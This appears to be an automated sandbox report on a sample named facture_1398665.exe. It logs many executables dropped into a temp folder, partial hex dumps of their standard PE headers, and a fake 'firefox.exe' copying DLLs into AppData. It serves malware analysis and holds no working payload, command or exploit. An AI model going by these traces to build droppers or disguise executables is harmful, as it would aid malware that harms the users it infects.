MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................

success or wait 1 4AACAC WriteFile

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-AMM6D.tmp

unknown 18624 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 cd 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................

success or wait 1 4AACAC WriteFile


C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-4DUIV.tmp

unknown 17600 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 ce 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................

success or wait 1 4AACAC WriteFile

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-K7B63.tmp

unknown 17600 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 ce 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................

success or wait 1 4AACAC WriteFile


C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-9RVAV.tmp

unknown 18112 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 ce 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 04 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................

success or wait 1 4AACAC WriteFile

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-5SLTH.tmp

unknown 20160 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 ce 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 0c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................

success or wait 1 4AACAC WriteFile


C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-H27TI.tmp

unknown 18624 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 ce 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................

success or wait 1 4AACAC WriteFile

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-SJFE0.tmp

unknown 19136 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 ce 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 08 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................

success or wait 1 4AACAC WriteFile


C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-QD0HG.tmp

unknown 18112 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 ce 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 04 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................

success or wait 1 4AACAC WriteFile

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-KMNP5.tmp

unknown 18112 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 ce 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 04 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................

success or wait 1 4AACAC WriteFile


C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-ENSEN.tmp

unknown 19136 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 e3 9a 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 08 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................

success or wait 1 4AACAC WriteFile

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-L7E6Q.tmp

unknown 22208 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 ce 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 14 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 30 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!.........................0.....................

success or wait 1 4AACAC WriteFile


C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-LQISF.tmp

unknown 18624 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 0a 9b 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................

success or wait 1 4AACAC WriteFile

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-MQDR2.tmp

unknown 20160 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 bb 0a c1 63 da 64 92 63 da 64 92 63 da 64 92 0e 87 64 93 62 da 64 92 0e 87 60 93 61 da 64 92 0e 87 9b 92 62 da 64 92 0e 87 66 93 62 da 64 92 52 69 63 68 63 da 64 92 50 45 00 00 4c 01 02 00 ce 94 99 57 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 00 00 0c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.d.c.d.c.d...d.b.d... .a.d.....b.d...f.b.d.Richc.d.PE..L......W...........!......................... .....................

success or wait 1 4AACAC WriteFile


C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-BKEF7.tmp

unknown 18624 (hex and ASCII dump of the MZ/PE header omitted)

success or wait 1 4AACAC WriteFile

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-BVQS8.tmp

unknown 18624 (hex and ASCII dump of the MZ/PE header omitted)

success or wait 1 4AACAC WriteFile


C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-SNF6L.tmp

unknown 28864 (hex and ASCII dump of the MZ/PE header omitted)

success or wait 1 4AACAC WriteFile

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-EOC8V.tmp

unknown 25792 (hex and ASCII dump of the MZ/PE header omitted)

success or wait 1 4AACAC WriteFile


C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-A8QRP.tmp

unknown 65536 (hex and ASCII dump of the MZ/PE header omitted)

success or wait 2 4AACAC WriteFile

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-J5TU2.tmp

unknown 19136 (hex and ASCII dump of the MZ/PE header omitted)

success or wait 1 4AACAC WriteFile


C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-UPNUP.tmp

unknown 22720 (hex and ASCII dump of the MZ/PE header omitted)

success or wait 1 4AACAC WriteFile

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-85NCL.tmp

unknown 24256 (hex and ASCII dump of the MZ/PE header omitted)

success or wait 1 4AACAC WriteFile


C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-F0F55.tmp

unknown 24256 (hex and ASCII dump of the MZ/PE header omitted)

success or wait 1 4AACAC WriteFile

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-ARJ01.tmp

unknown 20672 (hex and ASCII dump of the MZ/PE header omitted)

success or wait 1 4AACAC WriteFile


C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-7MF7K.tmp

unknown 18624 (hex and ASCII dump of the MZ/PE header omitted)

success or wait 1 4AACAC WriteFile

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-E6HJR.tmp

unknown 11 4c 4f 4c 5f 44 4c 4c 2e 64 6c 6c

LOL_DLL.dll success or wait 1 4AACAC WriteFile

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-TLFG5.tmp

unknown 65536 (hex and ASCII dump of the MZ/PE header omitted)

success or wait 9 4AACAC WriteFile


C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-R06PT.tmp

unknown 22117 (hex and ASCII dump of JFIF image data omitted)

success or wait 1 4AACAC WriteFile

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-VQCNU.tmp

unknown 65536 (hex and ASCII dump of the MZ/PE header omitted)

success or wait 2 4AACAC WriteFile


C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-599GA.tmp

unknown 65536 (hex and ASCII dump of the MZ/PE header omitted)

success or wait 3 4AACAC WriteFile

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-8PSLE.tmp

unknown 65536 (hex and ASCII dump of the MZ/PE header omitted)

success or wait 7 4AACAC WriteFile


C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-5UL7D.tmp

unknown 65536 (hex and ASCII dump of the MZ/PE header omitted)

success or wait 14 4AACAC WriteFile

C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-6FJQD.tmp

unknown 65536 (hex and ASCII dump of the MZ/PE header omitted)

success or wait 14 4AACAC WriteFile


C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\is-437NP.tmp

unknown 65536 (hex and ASCII dump of the MZ/PE header omitted)

success or wait 2 4AACAC WriteFile

File Read

File Path Offset Length Completion Count Source Address Symbol

C:\Users\user\Desktop\facture_1398665.exe unknown 64 success or wait 1 4AABDC ReadFile

C:\Users\user\Desktop\facture_1398665.exe unknown 4 success or wait 2 4AABDC ReadFile

C:\Users\user\Desktop\facture_1398665.exe unknown 4 success or wait 2 4AABDC ReadFile

C:\Users\user\Desktop\facture_1398665.exe unknown 4 success or wait 2 4AABDC ReadFile

C:\Users\user\Desktop\facture_1398665.exe unknown 4 success or wait 2 4AABDC ReadFile

C:\Users\user\Desktop\facture_1398665.exe unknown 4 success or wait 1 4AABDC ReadFile

C:\Users\user\Desktop\facture_1398665.exe unknown 1 success or wait 25 4AABDC ReadFile

Registry Activities

Key Path Completion Count Source Address Symbol

Key Path Name Type Data Completion Count Source Address Symbol

Analysis Process: firefox.exe PID: 3844 Parent PID: 3824

General

Start time: 14:49:23

Start date: 07/05/2018

Path: C:\Users\user\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe

Wow64 process (32bit): false

Commandline: C:\Users\user~1\AppData\Local\Temp\is-7I2SS.tmp\firefox.exe

Imagebase: 0x1350000

File size: 531408 bytes

MD5 hash: 52FFABA4273678BAE75442F2BC85B470

Has administrator privileges: true

Programmed in: C, C++ or other language

Reputation: low

File Activities

File Path Access Attributes Options Completion Count Source Address Symbol

C:\Users\user\AppData\Roaming\F48A04623C4E0000 read data or list directory and synchronize

normal directory file and synchronous io non alert and open for backup ident and open reparse point

success or wait 1 2E34A4 CreateDirectoryA

C:\Users\user\AppData\Roaming\F48A04623C4E0000 read data or list directory and synchronize

normal directory file and synchronous io non alert and open for backup ident and open reparse point

object name collision 1 2E2F63 CreateDirectoryA

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-console-l1-1-0.dll

read data or list directory and read attributes and delete and synchronize and generic write

archive and not contend indexed

sequential only and non directory file

success or wait 1 2E30C7 CopyFileA

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-datetime-l1-1-0.dll

read data or list directory and read attributes and delete and synchronize and generic write

archive and not contend indexed

sequential only and synchronous io non alert and non directory file

success or wait 1 2E30C7 CopyFileA

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-debug-l1-1-0.dll

read data or list directory and read attributes and delete and synchronize and generic write

archive and not contend indexed

sequential only and synchronous io non alert and non directory file

success or wait 1 2E30C7 CopyFileA

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-errorhandling-l1-1-0.dll

read data or list directory and read attributes and delete and synchronize and generic write

archive and not contend indexed

sequential only and synchronous io non alert and non directory file

success or wait 1 2E30C7 CopyFileA

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-file-l1-1-0.dll

read data or list directory and read attributes and delete and synchronize and generic write

archive and not contend indexed

sequential only and synchronous io non alert and non directory file

success or wait 1 2E30C7 CopyFileA

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-file-l1-2-0.dll

read data or list directory and read attributes and delete and synchronize and generic write

archive and not contend indexed

sequential only and synchronous io non alert and non directory file

success or wait 1 2E30C7 CopyFileA

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-file-l2-1-0.dll

read data or list directory and read attributes and delete and synchronize and generic write

archive and not contend indexed

sequential only and synchronous io non alert and non directory file

success or wait 1 2E30C7 CopyFileA

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-handle-l1-1-0.dll

read data or list directory and read attributes and delete and synchronize and generic write

archive and not contend indexed

sequential only and synchronous io non alert and non directory file

success or wait 1 2E30C7 CopyFileA

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-heap-l1-1-0.dll

read data or list directory and read attributes and delete and synchronize and generic write

archive and not contend indexed

sequential only and synchronous io non alert and non directory file

success or wait 1 2E30C7 CopyFileA

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-interlocked-l1-1-0.dll

read data or list directory and read attributes and delete and synchronize and generic write

archive and not contend indexed

sequential only and synchronous io non alert and non directory file

success or wait 1 2E30C7 CopyFileA

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-libraryloader-l1-1-0.dll

read data or list directory and read attributes and delete and synchronize and generic write

archive and not contend indexed

sequential only and synchronous io non alert and non directory file

success or wait 1 2E30C7 CopyFileA

C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-localization-l1-2-0.dll

read data or list directory and read attributes and delete and synchronize and generic write

archive and not contend indexed

sequential only and synchronous io non alert and non directory file

success or wait 1 2E30C7 CopyFileA

File Created


C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-memory-l1-1-0.dll

File Path | Access | Attributes | Options | Completion | Count | Source Address | Symbol
(path on previous page) | read data or list directory and read attributes and delete and synchronize and generic write | archive and not content indexed | sequential only and synchronous io non alert and non directory file | success or wait | 1 | 2E30C7 | CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-namedpipe-l1-1-0.dll | read data or list directory and read attributes and delete and synchronize and generic write | archive and not content indexed | sequential only and synchronous io non alert and non directory file | success or wait | 1 | 2E30C7 | CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-processenvironment-l1-1-0.dll | read data or list directory and read attributes and delete and synchronize and generic write | archive and not content indexed | sequential only and synchronous io non alert and non directory file | success or wait | 1 | 2E30C7 | CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-processthreads-l1-1-0.dll | read data or list directory and read attributes and delete and synchronize and generic write | archive and not content indexed | sequential only and synchronous io non alert and non directory file | success or wait | 1 | 2E30C7 | CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-processthreads-l1-1-1.dll | read data or list directory and read attributes and delete and synchronize and generic write | archive and not content indexed | sequential only and synchronous io non alert and non directory file | success or wait | 1 | 2E30C7 | CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-profile-l1-1-0.dll | read data or list directory and read attributes and delete and synchronize and generic write | archive and not content indexed | sequential only and synchronous io non alert and non directory file | success or wait | 1 | 2E30C7 | CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-rtlsupport-l1-1-0.dll | read data or list directory and read attributes and delete and synchronize and generic write | archive and not content indexed | sequential only and synchronous io non alert and non directory file | success or wait | 1 | 2E30C7 | CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-string-l1-1-0.dll | read data or list directory and read attributes and delete and synchronize and generic write | archive and not content indexed | sequential only and synchronous io non alert and non directory file | success or wait | 1 | 2E30C7 | CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-synch-l1-1-0.dll | read data or list directory and read attributes and delete and synchronize and generic write | archive and not content indexed | sequential only and synchronous io non alert and non directory file | success or wait | 1 | 2E30C7 | CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-synch-l1-2-0.dll | read data or list directory and read attributes and delete and synchronize and generic write | archive and not content indexed | sequential only and synchronous io non alert and non directory file | success or wait | 1 | 2E30C7 | CopyFileA
C:\Users\user\AppData\Roaming\F48A04623C4E0000\api-ms-win-core-sysinfo-l1-1-0.dll | read data or list directory and read attributes and delete and synchronize and generic write | archive and not content indexed | sequential only and synchronous io non alert and non directory file | success or wait | 1 | 2E30C7 | CopyFileA
